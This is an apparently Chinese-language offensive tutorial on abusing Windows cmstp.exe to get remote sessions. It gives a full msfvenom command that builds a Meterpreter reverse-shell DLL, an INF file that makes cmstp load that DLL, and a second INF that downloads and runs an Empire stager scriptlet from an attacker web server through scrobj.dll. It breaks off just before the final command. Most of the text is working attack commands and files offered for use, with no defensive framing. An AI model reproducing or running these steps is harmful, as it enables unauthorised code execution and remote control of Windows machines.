CMSTP
cmstp用于安装或删除连接管理器服务配置文件。在没有可选参数的情况下使用,cmstp 仅适用于操作系统和用户权限的默认设置安装服务配置文件。
Metasploit
使用Metasploit生成payload:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 -f dll > evil.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes创建一个用于cmstp运行的inf文件:
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\snowwolf\Desktop\evil.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="mantvydas"
ShortSvcName="mantvydas"将两个文件发送到Windows主机并运行以下命令即可获取到会话:
cmstp.exe /s f.infEmpire
在创建stager处选择windows/launcher_sct并配置监听器即可。
将生成的stager(cmstp.sct)保存到网页目录并编辑以下inf文件:
;cmstp.exe /s *.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://192.168.8.145/cmstp.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"在Windows主机中运行以下命令即可获取到会话:
